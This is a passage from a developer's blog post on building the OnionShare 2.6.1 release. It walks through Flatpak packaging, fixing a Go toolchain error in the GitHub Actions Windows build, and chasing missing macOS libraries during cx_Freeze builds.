<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">urllib3 waitress werkzeug wheel wsproto zipp zope-event zope-interface</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/b5/82/ce0b6380f35f49d3fe687979a324c342cfa3588380232f3801db9dd62f9e/bidict-0.22.1-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/0d/f1/5f39e771cd730d347539bb74c6d496737b9d5f0a53bc9fdbf3e170f1ee48/blinker-1.6.2-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">c3d739772abb7bc2860abf5f2ec284223d9ad5c76da018234f6f50d6f31ab1f0</span>
<span class="l l-Scalar l-Scalar-Plain">--snip--</span>
</pre></div>
<p>And now, remarkably, I can build the Flatpak package and it actually runs!</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
$ flatpak run org.onionshare.OnionShare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
</code></pre>
<p><img src="flatpak-onionshare.png" alt="Screenshot of OnionShare running in Flatpak"></p>
<p>I tried out a few things. I connected to Tor, I shared some files with myself and downloaded them using Tor Browser, and I tested connecting to Tor using a bridge. It all works! I think, finally, I have finished Flatpak packaging.</p>
<h2 id="updating-dependencies-again">Updating dependencies again</h2><p>I already did this in part 1, but it's been a few weeks and a lot of new versions of dependencies have been released. So I went ahead and updated all of the Poetry deps like this:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli
poetry<span class="w"> </span>update
<span class="nb">cd</span><span class="w"> </span>../desktop
poetry<span class="w"> </span>update
<span class="nb">cd</span><span class="w"> </span>../docs
poetry<span class="w"> </span>update
</pre></div>
<p>This is especially important because OnionShare depends on <code>gevent</code> which just had a <a href="https://github.com/advisories/GHSA-x7m3-jprg-wc5g">critical privilege escalation vulnerability</a> (though we confirmed that OnionShare itself isn't vulnerable to it).</p>
<h2 id="building-onionshare-for-windows">Building OnionShare for Windows</h2><p>Making a release is always painful, but this one has been much more painful than normal. With my Flatpak woes out of the way, I'm hoping for smooth sailing going forward. In order to reduce the pain, I've tried to automate as much of the Windows and macOS build process as I can using a <a href="https://docs.github.com/en/actions">GitHub Actions</a> workflow. Basically, when I push new commits to a PR on GitHub, a robot goes to work trying to build binaries for me for 64-bit Windows, Intel macOS, and also Snapcraft and Flatpak for Linux.</p>
<p>After I pushed my latest commit to my <a href="https://github.com/onionshare/onionshare/pull/1749">PR branch</a>, the GitHub Actions workflow was triggered. It successfully built Snapcraft and Flatpak binaries, but it failed at building Windows and macOS binaries.</p>
<p><img src="github-actions-1.png" alt="Screenshot of the GitHub Actions workflow, with the build-win64 and build-mac-intel jobs failing"></p>
<p>When I click on the failed <code>build-win64</code> job for details, I see that it failed on the "Build snowflake" step:</p>
<p><img src="github-actions-2.png" alt="Failing on the build-win64 job, in the build snowflake step"></p>
<h3 id="debugging-windows-build-in-github-actions">Debugging Windows build in GitHub Actions</h3><p>Let me back up and explain what's going on. In the OnionShare git repo there's a file called <code>.github/workflows/build.yml</code> that defines code that tells VMs how to build these binaries. Here's the beginning of the code for the <code>build-win64</code> job:</p>
<div class="hll"><pre><span></span><span class="nt">build-win64</span><span class="p">:</span>
<span class="w"> </span><span class="nt">runs-on</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">windows-latest</span>
<span class="w"> </span><span class="nt">steps</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/checkout@v3</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install python</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/setup-python@v4</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">python-version</span><span class="p">:</span><span class="w"> </span><span class="s">'3.10.11'</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install poetry</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C:\hostedtoolcache\windows\Python\3.10.11\x64\python -m pip install poetry</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Restore cache - poetry</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/cache@v3</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">~\AppData\Local\pypoetry\Cache\virtualenvs</span>
<span class="w"> </span><span class="nt">key</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">${{ runner.os }}-win64-poetry-${{ hashFiles('desktop/poetry.lock') }}</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install poetry dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry install</span>
<span class="w"> </span><span class="no">C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry env list --full-path</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Restore cache - tor</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/cache@v3</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">desktop\build\tor</span>
<span class="w"> </span><span class="nt">key</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">${{ runner.os }}-win64-tor-${{ hashFiles('desktop/scripts/get-tor.py') }}</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Get tor binaries from Tor Browser (64-bit)</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd desktop && C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry run python .\scripts\get-tor.py win64</span>
</pre></div>
<p>Basically, GitHub Actions starts a Windows VM that's preloaded with development tools and then runs these steps one at a time. First it checks out the git repo, then installs Python 3.10.11, then using that version of Python it installs Poetry. It then installs the Poetry dependencies, and runs the <code>desktop/scripts/get-tor.py</code> Python script to download Tor Browser for Windows and extract the binaries.</p>
<p>Before various steps this job also restores some caches. This saves time. For example, if I push a new commit and <code>desktop/poetry.lock</code> hasn't changed, then it just uses the Poetry virtualenv from the previous run instead of having to re-download and install all of the Poetry deps.</p>
<p>This is the step that it's failing on:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build snowflake</span>
<span class="w"> </span><span class="nt">shell</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pwsh</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">if ((Test-Path -Path 'desktop\onionshare\resources\tor\snowflake-client.exe') -eq $True) {</span>
<span class="w"> </span><span class="no">Write-Output "snowflake already built"</span>
<span class="w"> </span><span class="no">} else {</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">.\scripts\build-pt-snowflake.ps1</span>
<span class="w"> </span><span class="no">}</span>
</pre></div>
<p>This is a small PowerShell script. It basically checks to see if <code>snowflake-client.exe</code> already exists (if the it was cached from a previous job) and if so outputs a message that it's already built. Otherwise, it runs the <code>scripts/build-pt-snowflake.ps1</code> PowerShell script to compile it.</p>
<p>Here's the content of the <code>build-pt-snowflake.ps1</code> script:</p>
<div class="hll"><pre><span></span><span class="nv">$env:SNOWFLAKE_TAG</span> <span class="p">=</span> <span class="s1">'v2.6.0'</span>
<span class="nb">New-Item</span> <span class="n">-ItemType</span> <span class="n">Directory</span> <span class="n">-Force</span> <span class="n">-Path</span> <span class="p">.\</span><span class="n">build</span><span class="p">\</span><span class="n">snowflake</span>
<span class="nb">cd </span><span class="p">.\</span><span class="n">build</span><span class="p">\</span><span class="n">snowflake</span>
<span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">git</span><span class="p">.</span><span class="n">torproject</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">pluggable-transports</span><span class="p">/</span><span class="n">snowflake</span><span class="p">.</span><span class="n">git</span>
<span class="nb">cd </span><span class="n">snowflake</span>
<span class="n">git</span> <span class="n">checkout</span> <span class="nv">$SNOWFLAKE_TAG</span>
<span class="n">go</span> <span class="n">build</span> <span class="p">.\</span><span class="n">client</span>
<span class="nb">Move-Item</span> <span class="n">-Path</span> <span class="p">.\</span><span class="n">client</span><span class="p">.</span><span class="n">exe</span> <span class="n">-Destination</span> <span class="p">..\..\..\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">resources</span><span class="p">\</span><span class="n">tor</span><span class="p">\</span><span class="n">snowflake-client</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p>This creates a folder, clones the Snowflake source code into it, checks out the correct branch for the version we want to build, compiles it with Go, and then moves the binary.</p>
<p>And here's the error message from this step:</p>
<pre><code> Directory: D:\a\onionshare\onionshare\desktop\build
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 9/28/2023 1:45 AM snowflake
Cloning into 'snowflake'...
warning: redirecting to https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/snowflake.git/
Your branch is up to date with 'origin/main'.
go: errors parsing go.mod:
D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\go.mod:5: unknown directive: toolchain
Move-Item: D:\a\onionshare\onionshare\desktop\scripts\build-pt-snowflake.ps1:9
Line |
9 | Move-Item -Path .\client.exe -Destination ..\..\..\onionshare\resourc …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Cannot find path 'D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\client.exe' because it does not
| exist.
Error: Process completed with exit code 1.
</code></pre>
<p>It looks like there was an error trying to compile Snowflake, and so moving the binary failed because the binary was never created.</p>
<p>I don't currently have a Windows VM for OnionShare development, so I'm going to create a new one and see if I can reproduce this issue.</p>
<h3 id="setting-up-windows-for-onionshare-development">Setting up Windows for OnionShare development</h3><p>I downloaded the <a href="https://www.microsoft.com/software-download/windows11">Windows 11 ISO from Microsoft</a>. In case you don't know, Microsoft lets you download ISOs for Windows which you can then install in VMs or on computers, for free. When you're installing it, you can just say you don't have a license key, and it lets you continue. You can use Windows as much as you want without paying for it, but certain features are disabled, such as the ability to change your desktop wallpaper. For the purposes of software development, you don't need any of those features.</p>
<p>I installed <a href="https://www.virtualbox.org/">VirtualBox</a>, created a new Windows 11 VM, and booted to it, installing Windows 11 Pro. After setting up an account, I installed all of the updates, so now I have an up-to-date Windows 11 box:</p>
<p><img src="win11-vm.png" alt="Windows 11 VM"></p>
<p>Then, I follow the instructions in <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md"><code>desktop/README.md</code></a> to set up the development environment, specifically following the Windows instructions. This includes:</p>
<ul>
<li>Installing <a href="https://git-scm.com/download/win">Git for Windows</a>.</li>
<li>Cloning the OnionShare git repo, and checking out the <code>release-2.6.1</code> branch.</li>
<li>Installing <a href="https://www.python.org/downloads/windows/">Python for Windows</a>.</li>
<li>Installing Poetry and the Poetry dependencies. In PowerShell:<div class="hll"><pre><span></span><span class="n">pip</span> <span class="n">install</span> <span class="n">poetry</span>
<span class="nb">cd </span><span class="n">code</span><span class="p">\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">desktop</span>
<span class="n">poetry</span> <span class="n">install</span>
</pre></div>
</li>
<li>Installing <a href="https://visualstudio.microsoft.com/visual-cpp-build-tools/">Microsoft C++ Build Tools</a>, specifically "Desktop development with C++".</li>
<li>Installing 7-Zip and gpg4win, and also adding both of these to the path so I can run them from PowerShell.</li>
<li>Running the <code>get-tor.py</code> script to download Tor Browser and extract the binaries:<div class="hll"><pre><span></span><span class="nb">cd </span><span class="n">code</span><span class="p">\</span><span class="n">onionshare</span><span class="p">\</span><span class="n">desktop</span>
<span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="nb">get-tor</span><span class="p">.</span><span class="n">py</span> <span class="n">win64</span>
</pre></div>
</li>
<li>Installing <a href="https://golang.org/doc/install">Go</a>.</li>
</ul>
<p>The next step in the instructions is to run the PowerShell scripts that build obfs4proxy, snowflake, and meek. This is also the step where the GitHub Actions job failed. So, I'll start with obfs4proxy:</p>
<p><img src="win11-pt-build-error.png" alt="Error running PowerShell scripts"></p>
<p>When I tried running the obfs4proxy build script I got the following error:</p>
<pre><code>PS C:\Users\dev\code\onionshare\desktop> .\scripts\build-pt-obfs4proxy.ps1
.\scripts\build-pt-obfs4proxy.ps1 : File
C:\Users\dev\code\onionshare\desktop\scripts\build-pt-obfs4proxy.ps1 cannot be loaded because running
scripts is disabled on this system. For more information, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\scripts\build-pt-obfs4proxy.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
</code></pre>
<p>This is because by default in Windows, PowerShell scripts can't just get executed. To fix this, I opened a PowerShell window as an administrator and ran <code>Set-ExecutionPolicy -ExecutionPolicy Bypass</code>:</p>
<pre><code>PS C:\Windows\system32> Get-ExecutionPolicy
Restricted
PS C:\Windows\system32> Set-ExecutionPolicy -ExecutionPolicy Bypass
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): Y
PS C:\Windows\system32>
</code></pre>
<p>Then, back in my original PowerShell window, I ran <code>.\scripts\build-pt-obfs4proxy.ps1</code> again, and this time it worked: it downloaded the obfs4proxy source, compiled it, and then moved the binary into the correct place in the OnionShare folder.</p>
<p>Now, let's try building snowflake, which is the one that failed in GitHub Actions. I ran <code>./scripts/build-pt-snowflake.sh</code>... and it worked fine. Okay, I'll have to figure out what's going on in GitHub Actions still. In the meantime, I also ran <code>./scripts/build-pt-meek.sh</code> to build meek, and that worked too.</p>
<p>And that's it, the development environment is set up. I tried running OnionShare with <code>poetry run onionshare -v</code>, and it worked!</p>
<p><img src="win11-onionshare.png" alt="OnionShare in Windows"></p>
<p>Right now this is just running OnionShare from the Python source tree--there's another step involved for turning it into a <code>.exe</code> executable and building the installer. But before doing that, I need to figure out how to fix the GitHub Actions job.</p>
<h3 id="debugging-windows-build-in-github-actions-some-more">Debugging Windows build in GitHub Actions some more</h3><p>Taking a closer look at the error message from the GitHub Actions log, this is where it's failing to build snowflake:</p>
<pre><code> go: errors parsing go.mod:
D:\a\onionshare\onionshare\desktop\build\snowflake\snowflake\go.mod:5: unknown directive: toolchain
</code></pre>
<p>Here's the top of <code>desktop\build\snowflake\snowflake\go.mod</code>:</p>
<div class="hll"><pre><span></span><span class="nx">module</span><span class="w"> </span><span class="nx">gitlab</span><span class="p">.</span><span class="nx">torproject</span><span class="p">.</span><span class="nx">org</span><span class="o">/</span><span class="nx">tpo</span><span class="o">/</span><span class="nx">anti</span><span class="o">-</span><span class="nx">censorship</span><span class="o">/</span><span class="nx">pluggable</span><span class="o">-</span><span class="nx">transports</span><span class="o">/</span><span class="nx">snowflake</span><span class="o">/</span><span class="nx">v2</span>
<span class="k">go</span><span class="w"> </span><span class="mf">1.21</span>
<span class="nx">toolchain</span><span class="w"> </span><span class="nx">go1</span><span class="mf">.21.1</span>
</pre></div>
<p>The <code>build-win64</code> job uses the <code>windows-latest</code> GitHub runner, which is <a href="https://github.com/actions/runner-images/blob/main/images/win/Windows2022-Readme.md">Windows Server 2022</a>. Looking up the documentation, it comes with Go 1.20.8 installed. My guess is I can fix this by installing the latest version of Go in the workflow.</p>
<p>I did this by adding the following step to <code>.github/workflows/build.yml</code>:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install Go >=1.21.1</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/setup-go@v4</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">go-version</span><span class="p">:</span><span class="w"> </span><span class="s">'>=1.21.1'</span>
<span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">go version</span>
</pre></div>
<p>I committed my code, pushed it to the <code>release-2.6.1</code> branch, and GitHub Actions re-ran. This time, the <code>build-win64</code> job finished! (The <code>build-mac-intel</code> job failed, but I'll work on that in a minute.)</p>
<p><img src="github-actions-3.png" alt="build-win64 finished in Github Actions"></p>
<h3 id="testing-the-windows-binary-from-github-actions">Testing the Windows binary from GitHub Actions</h3><p>This workflow also generated some artifacts, including a <code>win64-build</code> one:</p>
<p><img src="github-actions-4.png" alt="Artifacts generated by the Github Actions workflow"></p>
<p>I downloaded the artifact, <code>win64-build.zip</code>, and unzipped it. Inside is a file called <code>onionshare-win64.zip</code>, which I copied to my VM and unzipped there. Here's the folder with the OnionShare build:</p>
<p><img src="win11-ga-binary.png" alt="Explorer showing the OnionShare binary files"></p>
<p>I double-clicked on <code>onionshare.exe</code>, and it worked! An OnionShare window opened. I went ahead and connected to Tor, created an anonymous drop box, installed Tor Browser, and loaded my drop box to make sure it all worked.</p>
<p><img src="win11-ga-binary-onionshare.png" alt="Running OnionShare from the GitHub Actions-generated binary"></p>
<p>And for good measure, I also tested the CLI version of OnionShare in Windows:</p>
<p><img src="win11-ga-binary-onionshare-cli.png" alt="Running onionshare-cli.exe from the GitHub Actions-generated binary"></p>
<p>Great, Windows works! I'll still need to code sign and package it for distribution, but before I do that I want to create a signed git tag, and before I do <em>that</em> I want to make sure that the release is completely ready. I'll come back to Windows in a bit, but for now it's time to move on to macOS.</p>
<h2 id="building-onionshare-for-macos">Building OnionShare for macOS</h2><p>Just like the Windows release, the GitHub Actions workflow also builds a binary for macOS using the <code>build-mac-intel</code> job. At the moment this just builds the binary for Intel Macs. It can't yet make binaries for Apple Silicon Macs (M1 and M2 ARM64 processors).</p>
<p>I just looked it up, and according to GitHub's roadmap they'll be <a href="https://github.com/github/roadmap/issues/528">adding support for Apple Silicon</a> GitHub Action runners in Q4 of 2023. This means that for now I'll need to manually build the Apple Silicon binaries from my own Apple Silicon Mac, but I should be able to use the Intel binaries built by the workflow.</p>
<p>Anyway, back to the <code>build-mac-intel</code> job. Let's see why it was failing.</p>
<p><img src="github-actions-5.png" alt="The build-mac-intel job failing"></p>
<p>It failed on the "Build OnionShare" step, which is the final step before compressing the binary and saving it as a GitHub Actions artifact. There are 38,000 log messages though and it's not immediately clear exactly what caused it to fail.</p>
<p>I'm going to set up a macOS development environment for OnionShare and see if I can manually reproduce the problem.</p>
<h3 id="setting-up-macos-for-onionshare-development">Setting up macOS for OnionShare development</h3><p>I have an old early 2015 MacBook Pro (with an Intel processor) that I use as my dedicated macOS software release laptop. Just like for Windows, the instructions for setting up the macOS dev environment are in <code>desktop/README.md</code>.</p>
<p>I've already set up a dev environment on this computer in the past, but I'm going to update it for this release:</p>
<ul>
<li>I powered this computer on for the first time in many months and installed macOS updates. It runs macOS 12.7, the latest version that Apple still supports for this hardware. I also installed Homebrew updates.</li>
<li>This computer has Python 3.10.8 installed, so while I'm at it I updated it to the latest version, Python 3.11.5. Then I installed Poetry.</li>
<li>I switched to the <code>release-2.6.1</code> branch of in my <code>onionshare</code> source tree.</li>
<li>I installed the latest dependencies with Poetry.</li>
<li>I got the latest -Tor binaries by running:<pre><code>cd desktop
poetry run python ./scripts/get-tor.py macos
</code></pre>
</li>
<li>I upgraded the version of Go I had installed, and then built all of the pluggable transports by running:<pre><code>./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</code></pre>
</li>
</ul>
<p>And that's it, the development environment is set up. I tried running OnionShare with <code>poetry run onionshare -v</code>, and it worked!</p>
<p><img src="macos-onionshare.png" alt="OnionShare in macOS"></p>
<h3 id="building-the-macos-app-bundle">Building the macOS app bundle</h3><p>The GitHub Actions job failed on the "Build OnionShare" step, which is defined as this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Build OnionShare</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py build</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./setup-freeze.py bdist_mac</span>
<span class="w"> </span><span class="no">/Library/Frameworks/Python.framework/Versions/3.10/bin/poetry run python ./scripts/build-macos.py cleanup-build</span>
</pre></div>
<p>Or more simply:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>The Windows and Mac versions of OnionShare use software called <a href="https://marcelotduarte.github.io/cx_Freeze/">cx_Freeze</a> to "freeze" the Python code into executable binaries, <code>.exe</code> files in Windows and Mach-O files in macOS. The <code>build</code> step freezes the Python into binaries and the <code>bdist_mac</code> step creates a macOS app bundle (a <code>.app</code> folder, the kind that you drag into Applications). And the last <code>./scripts/build-macos.py cleanup-build</code> script deletes a bunch of unused stuff in from the app bundle, making the final file size much smaller.</p>
<p>I will try to manually run each of these steps on my old Mac and see if I can reproduce the problem:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
running build_py
creating build/lib
creating build/lib/onionshare
copying onionshare/tor_settings_tab.py -> build/lib/onionshare
--snip--
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/PySide6/Qt/plugins/sqldrivers/libqsqlodbc.dylib
copying /usr/local/opt/libiodbc/lib/libiodbc.2.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libiodbc.2.dylib
error: [Errno 2] No such file or directory: '/usr/local/opt/libiodbc/lib/libiodbc.2.dylib'
</code></pre>
<p>Aha, an error! It's trying to copy <code>/usr/local/opt/libiodbc/lib/libiodbc.2.dylib</code> into the build folder but failing because that file doesn't exist. Maybe I can just install it and then try again?</p>
<p>I ran <code>brew search libiodbc</code> and found that there's a package with that name, so I tried installing it:</p>
<div class="hll"><pre><span></span>brew<span class="w"> </span>install<span class="w"> </span>libiodbc
</pre></div>
<p>Afer installing it, I confirmed that the file <code>/usr/local/opt/libiodbc/lib/libiodbc.2.dylib</code> exists. So, I ran the build script again:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
--snip--
copying /Applications/Postgres.app/Contents/Versions/14/lib/libpq.5.dylib -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/libpq.5.dylib
error: [Errno 2] No such file or directory: '/Applications/Postgres.app/Contents/Versions/14/lib/libpq.5.dylib'
</code></pre>
<p>Another missing dependency. Ahh, and this must be why I made this step in the <code>build-macos-intel</code> job:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.5.12/Postgres-2.5.12-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.5.12-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.5.12-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.5.12-14</span>
</pre></div>
<p>It looks like I need to install the Postgres app, which PySide6 pulls a library out of. And hey, now that I look at it, that step also includes <code>brew install libiodbc</code> already--this must not be the first time I've debugged this specific issue.</p>
<p>Looking at <a href="https://github.com/PostgresApp/PostgresApp/releases">https://github.com/PostgresApp/PostgresApp/releases</a> I see that the latest version of the Postgres app, using Postgres 14, is 2.6.5. So I went ahead and updated that:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install cx_Freeze/PySide6 build dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">brew install libiodbc</span>
<span class="w"> </span><span class="no">cd ~/Downloads</span>
<span class="w"> </span><span class="no">curl -O -L https://github.com/PostgresApp/PostgresApp/releases/download/v2.6.5/Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">hdiutil attach Postgres-2.6.5-14.dmg</span>
<span class="w"> </span><span class="no">cp -r /Volumes/Postgres-2.6.5-14/Postgres.app /Applications/</span>
<span class="w"> </span><span class="no">hdiutil detach /Volumes/Postgres-2.6.5-14</span>
</pre></div>
<p>I installed this version of Postgres on my build machine, and ran the build script again. This time it succeeded!</p>
<p>So I moved on to the <code>bdist_mac</code> command, which should build the app bundle:</p>
<pre><code>% poetry run python ./setup-freeze.py bdist_mac
running bdist_mac
running build_exe
creating directory /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib
copying /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/cx_Freeze/bases/lib/Python -> /Users/user/code/onionshare/desktop/build/exe.macosx-10.9-universal2-3.11/lib/Python
--snip--
Resolved rpath:
